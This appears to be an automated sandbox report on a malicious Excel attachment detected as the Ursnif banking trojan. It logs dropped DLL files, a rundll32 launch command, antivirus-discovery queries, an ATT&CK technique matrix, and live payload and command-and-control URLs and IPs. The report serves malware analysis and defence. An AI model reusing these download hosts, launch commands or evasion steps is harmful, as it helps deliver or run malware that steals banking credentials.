      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\cnvmb.rty,DllRegisterServer
      Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1164 CREDAT:275457 /prefetch:2
      Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1164 CREDAT:799749 /prefetch:2
      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InprocServer32
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10001601 GetModuleHandleW,LoadLibraryW,GetProcAddress,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100021E3 push ecx; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001AC47F push ecx; ret
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\cnvmb.rtyJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ox9[1].pngJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\cnvmb.rtyJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ox9[1].pngJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\cnvmb.rtyJump to dropped file

      Boot Survival:

      barindex
      Drops PE files to the user root directoryShow sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\cnvmb.rtyJump to dropped file

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Yara detected UrsnifShow sources
      Source: Yara matchFile source: 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2536, type: MEMORY
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ox9[1].pngJump to dropped file
      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10001601 GetModuleHandleW,LoadLibraryW,GetProcAddress,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00180940 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\cnvmb.rty,DllRegisterServer
      Source: rundll32.exe, 00000003.00000002.2420076289.0000000000730000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420212763.0000000000A30000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: rundll32.exe, 00000003.00000002.2420076289.0000000000730000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420212763.0000000000A30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: rundll32.exe, 00000003.00000002.2420076289.0000000000730000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420212763.0000000000A30000.00000002.00000001.sdmpBinary or memory string: !Progman
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001A212D cpuid
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001AAEF6 GetSystemTimeAsFileTime,SetWaitableTimer,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001A212D GetUserNameW,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001AA06E CreateMutexW,GetLastError,CloseHandle,GetLastError,GetVersionExA,GetModuleHandleA,RtlImageNtHeader,CloseHandle,
      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: rundll32.exe, 00000004.00000002.2420139760.000000000064D000.00000004.00000020.sdmpBinary or memory string: V%ProgramFiles%\Windows Defender\MSASCui.exe
      Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - select * from antispywareproduct

      Stealing of Sensitive Information:

      barindex
      Yara detected UrsnifShow sources
      Source: Yara matchFile source: 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2536, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected UrsnifShow sources
      Source: Yara matchFile source: 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2536, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation111Path InterceptionProcess Injection12Masquerading121OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumData Obfuscation1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting11Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemorySecurity Software Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsNative API1Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Scripting11NTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol13Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonRundll321Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncSystem Information Discovery26Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobExtra Window Memory Injection1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      OCC-221220-TBU1XAT7X4.xls3%VirustotalBrowse
      OCC-221220-TBU1XAT7X4.xls0%ReversingLabs

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ox9[1].png100%AviraHEUR/AGEN.1138179
      C:\Users\user\cnvmb.rty100%AviraHEUR/AGEN.1138179
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ox9[1].png8%ReversingLabsWin32.Malware.Generic
      C:\Users\user\cnvmb.rty8%ReversingLabsWin32.Malware.Generic

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      4.2.rundll32.exe.10000000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      4.2.rundll32.exe.1c0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://hospader.xyz/index.htma;0%Avira URL Cloudsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      https://hospader.xyz/index.htm0%Avira URL Cloudsafe
      http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
      http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
      http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
      https://hospader.xyz/index.htmRoot0%Avira URL Cloudsafe
      http://%s=%s&file://&os=%u.%u_%u_%u_x%uindex.html;0%Avira URL Cloudsafe
      http://www.iis.fhg.de/audioPA0%URL Reputationsafe
      http://www.iis.fhg.de/audioPA0%URL Reputationsafe
      http://www.iis.fhg.de/audioPA0%URL Reputationsafe
      https://hospader.xyz/index.htmndex.htm0%Avira URL Cloudsafe
      http://companieshouseonlinedownload.com/ox9.png0%Avira URL Cloudsafe
      http://computername/printers/printername/.printer0%Avira URL Cloudsafe
      https://hospader.xyz0%Avira URL Cloudsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://treyresearch.net0%URL Reputationsafe
      http://treyresearch.net0%URL Reputationsafe
      http://treyresearch.net0%URL Reputationsafe
      https://hospader.xyz/index.htm10%Avira URL Cloudsafe
      https://hospader.xyz/favicon.ico0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      companieshouseonlinedownload.com
      47.254.169.221
      truefalse
        unknown
        hospader.xyz
        45.142.212.128
        truefalse
          unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://companieshouseonlinedownload.com/ox9.pngtrue
          • Avira URL Cloud: safe
          unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2420330626.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420433379.0000000002017000.00000002.00000001.sdmpfalse
            high
            http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmpfalse
              high
              https://hospader.xyz/index.htma;rundll32.exe, 00000004.00000002.2420139760.000000000064D000.00000004.00000020.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://investor.msn.comrundll32.exe, 00000003.00000002.2420131339.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmpfalse
                high
                http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2420131339.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmpfalse
                  high
                  http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2420330626.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420433379.0000000002017000.00000002.00000001.sdmptrue
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://hospader.xyz/index.htmrundll32.exe, 00000003.00000002.2420076289.0000000000730000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420139760.000000000064D000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000002.2420212763.0000000000A30000.00000002.00000001.sdmp, ~DF3C5C2A9E584434E2.TMP.10.drtrue
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.rundll32.exe, 00000004.00000002.2420654046.00000000023A0000.00000002.00000001.sdmpfalse
                    high
                    http://wellformedweb.org/CommentAPI/rundll32.exe, 00000004.00000002.2421932090.0000000004500000.00000002.00000001.sdmptrue
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://hospader.xyz/index.htmRoot{5591F91E-4571-11EB-ADCF-ECF4BBB5915B}.dat.10.drtrue
                    • Avira URL Cloud: safe
                    unknown
                    http://%s=%s&file://&os=%u.%u_%u_%u_x%uindex.html;rundll32.exe, 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmptrue
                    • Avira URL Cloud: safe
                    low
                    http://investor.msn.com/rundll32.exe, 00000003.00000002.2420131339.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmpfalse
                      high
                      http://www.iis.fhg.de/audioPArundll32.exe, 00000004.00000002.2421932090.0000000004500000.00000002.00000001.sdmptrue
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://hospader.xyz/index.htmndex.htm{5591F91E-4571-11EB-ADCF-ECF4BBB5915B}.dat.10.drtrue
                      • Avira URL Cloud: safe
                      unknown
                      http://computername/printers/printername/.printerrundll32.exe, 00000004.00000002.2421932090.0000000004500000.00000002.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      low
                      https://hospader.xyzrundll32.exe, 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      http://www.%s.comPArundll32.exe, 00000004.00000002.2420654046.00000000023A0000.00000002.00000001.sdmptrue
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      low
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2420330626.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420433379.0000000002017000.00000002.00000001.sdmptrue
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2420131339.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmpfalse
                        high
                        http://treyresearch.netrundll32.exe, 00000004.00000002.2421932090.0000000004500000.00000002.00000001.sdmptrue
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://hospader.xyz/index.htm1rundll32.exe, 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        https://hospader.xyz/favicon.icoimagestore.dat.11.drtrue
                        • Avira URL Cloud: safe
                        unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        47.254.169.221
                        unknownUnited States
                        45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                        45.142.212.128
                        unknownRussian Federation
                        200019ALEXHOSTMDfalse

                        General Information

                        Joe Sandbox Version:31.0.0 Red Diamond
                        Analysis ID:333660
                        Start date:23.12.2020
                        Start time:14:47:49
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 6m 9s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:OCC-221220-TBU1XAT7X4.xls
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                        Number of analysed new started processes analysed:14
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • GSI enabled (VBA)
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.bank.troj.expl.evad.winXLS@10/28@5/2
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 19.1% (good quality ratio 19.1%)
                        • Quality average: 87.7%
                        • Quality standard deviation: 20.4%
                        HCA Information:
                        • Successful, ratio: 76%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .xls
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Scroll down
                        • Close Viewer
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe, svchost.exe
                        • TCP Packets have been reduced to 100
                        • Excluded IPs from analysis (whitelisted): 88.221.62.148, 192.35.177.64, 8.248.139.254, 67.27.159.126, 8.253.204.120, 8.248.131.254, 8.248.117.254, 2.20.142.209, 2.20.142.210, 204.79.197.200, 13.107.21.200, 13.107.5.80
                        • Excluded domains from analysis (whitelisted): www.bing.com, au.download.windowsupdate.com.edgesuite.net, dual-a-0001.a-msedge.net, api.bing.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, e11290.dspg.akamaiedge.net, e-0001.e-msedge.net, go.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, go.microsoft.com.edgekey.net, audownload.windowsupdate.nsatc.net, www-bing-com.dual-a-0001.a-msedge.net, apps.digsigtrust.com, auto.au.download.windowsupdate.com.c.footprint.net, apps.identrust.com, au-bg-shim.trafficmanager.net, api-bing-com.e-0001.e-msedge.net
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        14:48:43API Interceptor207x Sleep call for process: rundll32.exe modified

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASN

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        ALEXHOSTMDxTWBTe8Yz3.exeGet hashmaliciousBrowse
                        • 176.123.2.251
                        xG4rjYxzCT.dllGet hashmaliciousBrowse
                        • 45.67.229.97
                        svhost.ps1Get hashmaliciousBrowse
                        • 176.123.8.228
                        SMBS PO 30 quotation.xlsGet hashmaliciousBrowse
                        • 176.123.0.55
                        IW2g2rzW9x.exeGet hashmaliciousBrowse
                        • 176.123.9.138
                        http://www.4413044130.stormletpet.com./UEt1c3RAc29mdHNvdXJjZS5jby5ueg==#aHR0cHM6Ly9vaGlzLm5nL29mZmljZS9vZjI/L1BLdXN0QHNvZnRzb3VyY2UuY28ubno=Get hashmaliciousBrowse
                        • 176.123.0.55
                        OrM0pS5PdK.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        hffMSxRxrO.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        uUYx0SUnV5.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        jocniwuamG.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        v3ARXpc5fv.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        cj6eP1ytv3.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        cyEM194elj.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        wLS9XGTCOv.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        ykyhMjKWPl.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        B8Rn1nX3cj.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        hVDdUEUTYm.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        pytHAUQXXc.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        q7Mq1T2O1z.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        NGalRIfPXE.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCInf_CHB9147.docGet hashmaliciousBrowse
                        • 149.129.52.21
                        59154-2212-122020.docGet hashmaliciousBrowse
                        • 149.129.52.21
                        4evQHr1FEO.exeGet hashmaliciousBrowse
                        • 8.208.28.65
                        LPwuWhMQBV.exeGet hashmaliciousBrowse
                        • 8.208.28.65
                        https://bit.ly/3gWlOK0Get hashmaliciousBrowse
                        • 8.208.92.142
                        https://bit.ly/2LFrQTDGet hashmaliciousBrowse
                        • 8.208.92.142
                        nmode1_u1.exeGet hashmaliciousBrowse
                        • 47.91.78.102
                        REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                        • 205.204.101.158
                        https://bit.ly/3amwxw2Get hashmaliciousBrowse
                        • 8.208.92.142
                        PO#14379 - SO#146001119375 XMAS wood land.exeGet hashmaliciousBrowse
                        • 47.251.51.14
                        https://www.compartirwifi.comGet hashmaliciousBrowse
                        • 198.11.136.21
                        SecuriteInfo.com.Trojan.DownLoader19.23899.32209.exeGet hashmaliciousBrowse
                        • 47.242.46.145
                        SecuriteInfo.com.Trojan.DownLoader19.23899.32209.exeGet hashmaliciousBrowse
                        • 47.242.46.145
                        http://oscf.koojom.com/indexGet hashmaliciousBrowse
                        • 8.208.92.142
                        http://bit.ly/2K9I7Q5Get hashmaliciousBrowse
                        • 8.208.92.142
                        ya.wav.dllGet hashmaliciousBrowse
                        • 8.208.96.63
                        RFQ 00068643 New Order Shipment to Jebel Ali Port UAE.exeGet hashmaliciousBrowse
                        • 47.91.169.15
                        Order No. BCM190282.exeGet hashmaliciousBrowse
                        • 47.242.134.251
                        https://bit.ly/3gKSztCGet hashmaliciousBrowse
                        • 8.208.92.142
                        https://bit.ly/3r7zqa6Get hashmaliciousBrowse
                        • 47.254.170.17

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        7dcce5b76c8b17472d024758970a406bDocument_8297.xlsbGet hashmaliciousBrowse
                        • 45.142.212.128
                        Document_8297.xlsbGet hashmaliciousBrowse
                        • 45.142.212.128
                        info_ (314).xlsmGet hashmaliciousBrowse
                        • 45.142.212.128
                        EHpIMi2I5F.docGet hashmaliciousBrowse
                        • 45.142.212.128
                        jgxmv58TUY.rtfGet hashmaliciousBrowse
                        • 45.142.212.128
                        FRAUD NOTIFICATION 35738-59.docGet hashmaliciousBrowse
                        • 45.142.212.128
                        r4pLtwclv6.docGet hashmaliciousBrowse
                        • 45.142.212.128
                        CITAR REF OT20-0338-01.docxGet hashmaliciousBrowse
                        • 45.142.212.128
                        BOL_860766.xlsmGet hashmaliciousBrowse
                        • 45.142.212.128
                        Document_7647.xlsbGet hashmaliciousBrowse
                        • 45.142.212.128
                        Document_7647.xlsbGet hashmaliciousBrowse
                        • 45.142.212.128
                        RxBaH0oWoR.docGet hashmaliciousBrowse
                        • 45.142.212.128
                        RxBaH0oWoR.docGet hashmaliciousBrowse
                        • 45.142.212.128
                        Nov. P.Order 0053.docxGet hashmaliciousBrowse
                        • 45.142.212.128
                        LETTER OF AUTHORITY 18DEC.xlsxGet hashmaliciousBrowse
                        • 45.142.212.128
                        Order List and Quantities.pptGet hashmaliciousBrowse
                        • 45.142.212.128
                        Email data form.docGet hashmaliciousBrowse
                        • 45.142.212.128
                        AWB DHL EXPRESS .docGet hashmaliciousBrowse
                        • 45.142.212.128
                        PAY SLIP.docGet hashmaliciousBrowse
                        • 45.142.212.128
                        Down Payment.docGet hashmaliciousBrowse
                        • 45.142.212.128

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                        Category:dropped
                        Size (bytes):117872
                        Entropy (8bit):7.994797855729196
                        Encrypted:true
                        SSDEEP:1536:i/LAvEZrGclx0hoW6qCLdNz2p+/LAvEZrGclx0hoW6qCLdNz2pj:UcMqZVCp8pwcMqZVCp8pj
                        MD5:DB381E85D86EA4484D20078E9EC667A6
                        SHA1:4871FDAF0C2EEC8183FC3CE7710B18FD3C647CEA
                        SHA-256:C3520E3A6EB43F6D416852C454414C5D7823A96FB9070BC30301ADDEBB334D4D
                        SHA-512:D9E03A617D1D9505D3ADA3C41FC8A53504F4F1C44F92AF00869F2FE150D6677FD4450E85EB1E3D920D32BA01F190E7F14BF130F8CC69EB47D834CCE43CAA7650
                        Malicious:false
                        Reputation:moderate, very likely benign file
